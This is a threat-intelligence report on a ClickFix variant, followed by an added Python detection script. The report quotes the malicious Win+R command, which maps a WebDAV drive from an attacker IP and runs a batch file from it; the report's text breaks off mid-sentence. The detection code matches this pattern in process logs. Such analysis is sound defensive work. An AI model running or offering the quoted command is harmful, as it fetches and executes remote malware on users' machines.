Investigating a New Click-Fix Variant
https://thehackernews.com/2026/03/investigating-new-click-fix-variant.html
Publish Date: 2026-03-13 09:28:00
Source Domain: thehackernews.com
Disclaimer: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only.
Read more blogs around threat intelligence and adversary research: https://atos.net/en/lp/cybershield
Summary
Atos researchers identified a new variant of the popular ClickFix technique, in which attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a “net use” command is used to map a network drive from an external server, after which a “.cmd” batch file hosted on that drive is executed. The script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside an “.asar” archive. The modified application acts as a C2 beacon and a dropper for the final malware payload.
Figure 1: High-level overview of attack flow.
Attack overview
In this version, the initial attack vector is the same as in all the other ones: a web page posing as a captcha mechanism, “happyglamper[.]ro”. It prompts the user to open the Run application via “Win+R”, followed by “Ctrl+V” and “Enter”.
Figure 2: Phishing website 1
Figure 3: Phishing website 2
This executes the following command:
"cmd.exe" /c net use Z: http://94.156.170[.]255/webdav /persistent:no && "Z:update.cmd" & net use Z: /delete
Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, we can see that “net use” is being used to map and connect to a network drive of an external server from which a Batch script is executed. While not novel, these TTPs were never seen in ClickFix attacks before. Combined with the next uncommon stages of…
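The command-line shape described above (a “net use” mapping to an HTTP URL, a script run from the mapped drive, then deletion of the mapping) can be hunted for in process-creation logs. The following Python detection logic is an added example, not part of the original report; the function name `analyze`, the extension list and the sample command lines are assumptions, and 203.0.113.10 is a documentation address used as a placeholder.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# "net use <drive>: http(s)://..." maps a WebDAV share as a drive letter.
MAP_RE = re.compile(r'\bnet(?:\.exe)?\s+use\s+([a-z]):\s+"?(https?://[^\s"]+)', re.I)
CHAIN_RE = re.compile(r'\s*(?:&&|\|\||&)\s*')  # cmd.exe command separators
RUNNABLE = r'(?:cmd|bat|ps1|vbs|js|hta|exe)'   # assumed list of runnable extensions

def analyze(cmdline):
    """Return findings for one process command line, or None if no WebDAV mapping."""
    m = MAP_RE.search(cmdline)
    if not m:
        return None
    drive, remote = m.group(1).upper(), m.group(2)
    # Accept both "Z:\file.cmd" and the drive-relative "Z:file.cmd" form.
    run_re = re.compile(rf'^"?({drive}:\\?[^\s"&|]+\.{RUNNABLE})\b', re.I)
    del_re = re.compile(rf'\bnet(?:\.exe)?\s+use\s+{drive}:\s+/d(?:elete)?\b', re.I)
    segments = CHAIN_RE.split(cmdline[m.end():])  # only commands after the mapping
    executed = [r.group(1) for r in map(run_re.match, segments) if r]
    try:
        ipaddress.ip_address(urlsplit(remote).hostname or "")
        raw_ip = True   # share addressed by bare IP rather than a hostname
    except ValueError:
        raw_ip = False
    return {
        "drive": drive,
        "remote": remote,
        "raw_ip_host": raw_ip,
        "executed": executed,
        "mapping_deleted": any(del_re.search(s) for s in segments),
        # Mapping alone is worth review; map-then-execute is the ClickFix shape.
        "severity": "high" if executed else "medium",
    }

# Constructed sample command lines, as they would appear in process-creation telemetry.
SAMPLES = [
    r'"cmd.exe" /c net use Z: http://203.0.113.10/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete',
    r'net use H: \\fileserver01\home /persistent:yes',
    r'cmd.exe /c net use W: https://dav.example.com/docs',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(analyze(sample))
```
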


